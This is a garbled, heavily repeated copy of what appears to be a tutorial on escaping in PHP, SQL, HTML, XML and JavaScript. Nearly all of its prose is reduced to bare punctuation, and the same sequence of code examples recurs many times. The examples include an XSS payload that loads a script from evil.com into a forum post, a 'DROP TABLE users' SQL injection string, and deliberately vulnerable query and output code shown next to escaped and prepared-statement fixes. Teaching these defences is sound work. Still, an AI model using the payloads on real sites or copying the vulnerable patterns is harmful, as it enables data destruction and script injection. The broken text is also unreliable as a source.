<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
